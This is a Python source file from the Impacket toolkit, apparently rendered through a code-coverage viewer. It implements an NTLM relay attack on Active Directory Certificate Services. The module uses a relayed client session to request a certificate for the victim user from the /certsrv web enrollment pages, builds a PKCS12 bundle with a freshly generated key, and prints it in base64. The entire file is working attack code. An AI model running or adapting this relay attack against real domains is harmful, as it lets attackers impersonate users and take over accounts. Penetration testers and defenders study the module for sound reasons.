Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1# Impacket - Collection of Python classes for working with network protocols. 

2# 

3# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved. 

4# 

5# This software is provided under a slightly modified version 

6# of the Apache Software License. See the accompanying LICENSE file 

7# for more information. 

8# 

9# Description: 

10# AD CS relay attack 

11# 

12# Authors: 

13# Ex Android Dev (@ExAndroidDev) 

14# Tw1sm (@Tw1sm) 

15 

16import re 

17import base64 

18from OpenSSL import crypto 

19 

20from impacket import LOG 

21 

22# cache already attacked clients 

23ELEVATED = [] 

24 

25 

26class ADCSAttack: 

27 

28 def _run(self): 

29 key = crypto.PKey() 

30 key.generate_key(crypto.TYPE_RSA, 4096) 

31 

32 if self.username in ELEVATED: 

33 LOG.info('Skipping user %s since attack was already performed' % self.username) 

34 return 

35 csr = self.generate_csr(key, self.username) 

36 csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+") 

37 LOG.info("CSR generated!") 

38 

39 data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, self.config.template) 

40 

41 headers = { 

42 "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", 

43 "Content-Type": "application/x-www-form-urlencoded", 

44 "Content-Length": len(data) 

45 } 

46 

47 LOG.info("Getting certificate...") 

48 

49 self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers) 

50 ELEVATED.append(self.username) 

51 response = self.client.getresponse() 

52 

53 if response.status != 200: 

54 LOG.error("Error getting certificate! Make sure you have entered valid certiface template.") 

55 return 

56 

57 content = response.read() 

58 found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode()) 

59 if len(found) == 0: 

60 LOG.error("Error obtaining certificate!") 

61 return 

62 

63 certificate_id = found[0] 

64 

65 self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id) 

66 response = self.client.getresponse() 

67 

68 LOG.info("GOT CERTIFICATE!") 

69 certificate = response.read().decode() 

70 

71 certificate_store = self.generate_pfx(key, certificate) 

72 LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode())) 

73 

74 def generate_csr(self, key, CN): 

75 LOG.info("Generating CSR...") 

76 req = crypto.X509Req() 

77 req.get_subject().CN = CN 

78 req.set_pubkey(key) 

79 req.sign(key, "sha256") 

80 

81 return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req) 

82 

83 def generate_pfx(self, key, certificate): 

84 certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate) 

85 p12 = crypto.PKCS12() 

86 p12.set_certificate(certificate) 

87 p12.set_privatekey(key) 

88 return p12.export()